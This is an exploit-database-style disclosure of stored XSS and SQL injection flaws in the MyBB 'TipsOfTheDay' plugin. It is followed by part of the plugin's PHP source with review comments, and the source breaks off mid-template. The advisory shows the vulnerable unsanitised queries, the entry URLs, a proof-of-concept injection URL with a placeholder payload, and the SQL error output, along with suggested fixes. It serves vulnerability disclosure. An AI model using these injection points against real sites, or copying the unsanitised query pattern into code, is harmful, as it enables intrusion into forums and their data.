# Exploit Title: TipsOfTheDay mybb plugin stored XSS and SQL injection vulnerabilities.
# Date: 12.12.2012
# Exploit Author: VipVince
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://mods.mybb.com/view/tips-of-the-day
# Version: 1.0
# Tested on: Windows

The tipsoftheday.php file is vulnerable to two common web vulnerabilities. I will demonstrate below:

********************************** Stored XSS. **********************************************

The vulnerability lies here.

simple_select("tipsoftheday_users", "*", "totdid=".$mybb->input['approve']); ?>

And can be exploited here.

http://www.server.com/dir/misc.php?tips=newtip

Add into the boxes as newtip and then refresh the page. Bingo, our stored XSS pops up. (The fix is to HTML-escape the stored tip text wherever it is displayed, e.g. with htmlspecialchars_uni(); note that the 'approve' query above concatenates request input into SQL in the same way as the query in the next section.)

**************************************** SQLi Vuln ***************************************************

simple_select("tipsoftheday", "*", "totdid=".$mybb->input['tip']); $tip = $db->fetch_array($query); ?>

As you can see, the id has not been sanitized before being concatenated into the WHERE clause (the fix is to cast it to an integer first, e.g. intval($mybb->input['tip'])). It can be exploited via the admin panel. POC below:

http://www.server.com/bladir/admin/index.php?module=config-tipsoftheday&action=edittip&tip=[VALID_ID]'[SQLi]

Result.

[quote]
MyBB has experienced an internal SQL error and cannot continue.
SQL Error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Query: SELECT * FROM mybb_tipsoftheday WHERE totdid=1'
[/quote]

Brought to you by VipVince. Enjoy the 12/12/2012 "it only comes once" and all that bullshit.
Please make sure IN_MYBB is defined."); }

// Hook registrations. Each hook name maps to a callback defined elsewhere in
// this file (the callbacks are not in this view). Three hooks are admin-side
// (config menu, config action handler, admin_load); index_start and misc_start
// are front-end entry points. misc_start -> tipsusers is the handler behind the
// misc.php?tips=newtip flow described in the advisory above.
$plugins->add_hook("admin_config_menu", "tipsoftheday_admin_nav");
$plugins->add_hook("admin_config_action_handler", "tipsoftheday_action_handler");
$plugins->add_hook("admin_load", "tipsoftheday_admin");
$plugins->add_hook("index_start", "tipsoftheday_index");
$plugins->add_hook("misc_start", "tipsusers");

/**
 * Plugin metadata consumed by the MyBB plugin manager.
 *
 * Loads the plugin's language file first so that "name" and "description"
 * can be taken from $lang; every other field is a static string.
 *
 * @return array<string, string>
 */
function tipsoftheday_info() {
    global $lang;
    $lang->load("config_tipsoftheday", false, true);
    return array(
        "name" => $lang->name,
        "description" => $lang->descriptionplugin,
        "website" => "http://mybb-es.com",
        "author" => "Edson Ordaz",
        "authorsite" => "http://mybb-es.com",
        "version" => "1.0",
        "guid" => "f52d89922b319c5256b23cd1b3f09eb1",
        "compatibility" => "*"
    );
}

/**
 * Activation hook: creates the plugin's two tables and inserts its templates.
 *
 * NOTE: the body of this function continues past the end of this view; only
 * the table creation and the start of the first template row are visible here.
 */
function tipsoftheday_activate() {
    global $db,$lang,$message;
    // NOTE(review): $lang->activatemessage is read before the language file is
    // loaded on the next line; this presumably relies on tipsoftheday_info()
    // having loaded it already -- confirm.
    $message .= $lang->activatemessage;
    $lang->load("config_tipsoftheday", false, true);
    // Both tables are created only when NEITHER exists; if exactly one is
    // present (e.g. after a partial removal) the missing one is never created.
    // The DDL below is static -- only TABLE_PREFIX is concatenated in, no
    // request data.
    if(!$db->table_exists("tipsoftheday") && !$db->table_exists("tipsoftheday_users")) {
        $db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday` ( `totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) NOT NULL, `tiptle` text NOT NULL DEFAULT '', `tip` text NOT NULL DEFAULT '', PRIMARY KEY (`totdid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
        $db->query("CREATE TABLE IF NOT EXISTS `".TABLE_PREFIX."tipsoftheday_users` ( `totdid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) NOT NULL, `tiptle` text NOT NULL DEFAULT '', `tip` text NOT NULL DEFAULT '', PRIMARY KEY (`totdid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;");
    }
    // Template row for the front-end tip display. The template body is passed
    // through $db->escape_string() (this protects the INSERT, not the later
    // rendering of {$tip['tip']}) and continues on the following lines.
    $tipsoftheday = array(
        "tid" => "NULL",
        "title" => 'tipsoftheday',
        "template" => $db->escape_string(' {$tip[\'tiptle\']}
{$tip[\'tip\']}

'), "sid" => "-1", ); $tipsoftheday_newtip = array( "tid" => "NULL", "title" => 'tipsoftheday_newtip', "template" => $db->escape_string(' {$lang->newtiptab} {$headerinclude} {$header}
{$lang->newtiptab}
{$lang->newtipsubject}
{$lang->newtipbody}